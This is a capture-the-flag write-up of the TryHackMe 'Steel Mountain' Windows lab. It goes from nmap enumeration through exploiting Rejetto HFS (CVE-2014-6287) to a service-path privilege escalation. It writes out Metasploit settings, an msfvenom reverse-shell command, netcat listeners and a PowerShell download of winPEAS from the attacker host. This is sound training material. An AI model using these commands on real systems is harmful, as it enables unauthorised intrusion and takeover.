TryHackMe Writeup: Steel Mountain
First, we start off with simple enumeration
nmap -sC -sV -Pn 10.10.103.240
Now, since we know nmap scans can take a bit, we can discern that we have a little extra time to do some manual enumeration. With that said, let’s see if this server is set up as a webserver and check common web ports 80, 8080 and 443
Port 80 looks like a standard web site
Port 8080 appears to be a file server
Now in the first screenshot (port 80), we see an “Employee of the month”. This is also the first question that appears on TryHackMe. Since there doesn’t appear to be any information other than the photo on the site, lets check the page source to see if the image is named after this mysterious person
Hmmmm… could it be Bill Harper? Yes, yes it is!
The second question is asking what other port a web server is running on. Our quick pre-nmap check showed port 8080 was running a file server. So we will enter 8080.
The next question is asking what file server is running. A quick glance at the page shows “HTTPFileServer 2.3”.
Since that clearly isn’t the answer, we click the highlighted link at the bottom and it takes us to a “rejetto http file server” site.
Let’s input that answer and move on.
Now before we go any further, let’s check the results of the nmap scan we launched earlier
It appears that SMB and RDP are also open. This might come in handy later! But for now, let’s go ahead and fire up Metasploit. We are gonna do a quick check and see if there’s a module for the file server.
Hmmm…
Ok, lets go ahead and configure and run this, since it seems promising and appears to match the software that is running.
set RHOSTS 10.10.103.240
set LHOSTS 10.9.240.85
set RPORT 8080
set LPORT 4444
Bombs away!
Annnnnnddddd BOOOMM!!
Looks like we have a low privileged shell under “Bill’s” UID
So we should have enough info to complete the next two questions. The CVE is CVE-2014–6287. We got this by typing the following into MSF:
info exploit/windows/http/rejetto_hfs_exec
The next question asks what the user flag is. So we will navigate through Bills user folders and try to locate the file
cd C:\Users\bill\*
We find a user.txt file on Bill’s Desktop. So we read it and discover the following:
Let’s enter that info as a flag and move on.
The next task is asking us to download a set of powershell scripts, and upload the “exploit” to the target machine. So after downloading, I loaded meterpreters “powershell” script, uploaded and ran the PowerUp file.
We will now load the powershell shell and run the script
powershell_shell
. .\PowerUp.ps1
Invoke-AllChecks
The next question asks what service shows up as an unquoted service path vulnerability and also has CanRestart set to True. Looks like it’s the AdvancedSystemCareService9 service
The next part is kind of tricky. The TryHackMe tutorial says to create a payload using msfvenom to replace the binary and name it “Advanced.exe”. This won’t work, as the name of the actual binary is ASCService.exe. So we will use that as the name instead
msfvenom -p windows/shell_reverse_tcp LHOST=10.9.240.85 LPORT=4443 -f exe -o ASCService.exe
Now set up a netcat listener to “catch” the shell
nc -nvlp 4443
Next, we will go into our current meterpreter session, drop into a shell and stop the current service
Then we will upload our malicious file and restart the service
Uh oh, that error doesn’t look good…. Let’s check out netcat listener
Phew, we’re good! Now lets read the root flag
#WINNING
Task 4
So at this point, I had walked away for a minute, only to return to an expired machine. So with the rest of the walk through, the IP address of the target will now be 10.10.227.39
For this task, it is essentially asking you to do the same thing, sans Metasploit. We begin by exploiting the same CVE, but using an exploit given by TryHackMe
https://www.exploit-db.com/exploits/39161
In addition to downloading that, we also need a netcat binary found here:
https://github.com/andrew-d/static-binaries/blob/master/binaries/windows/x86/ncat.exe
We also need a webserver to serve up the file. If you have apache installed, you can use that. I however will be using pythons SimpleHTTPServer. Open one terminal window, navigate to the ncat file you downloaded, rename it to nc.exe and start the server.
python3 -m http.server 80
Next, set up a listener in a separate window
nc -nvlp 1337
Modify the exploit to include your IP and port your listener is listening in on
Now run the exploit at least twice. If successful, you should now have a shell!
Now, since we are going to use WinPeas to enumerate the system, lets go ahead and move that webserver we started to the directory where winpeas is stored
cd /root/Desktop/tools/privilege-escalation-awesome-scripts-suite/winPEAS/winPEASexe/winPEAS/bin/x86/Release
python3 -m http.server 80
Now on the target shell we spawned, run:
powershell -c wget “http://10.9.240.85/winPEAS.exe" -outfile “winpeas.exe”
Once ran, we should see that we have Write/Create perms on the same service area that we exploited earlier
C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
We can generate a new msfvenom payload, or use the one created previously to run on port 4443. I will use that one.
First, let’s create a netcat listener to catch our shell
nc -nvlp 4443
Starting on bills desktop, we are going to upload our payload
Now stop the current service
And copy and overwrite the current service with our payload and restart the service
We should now have r00t!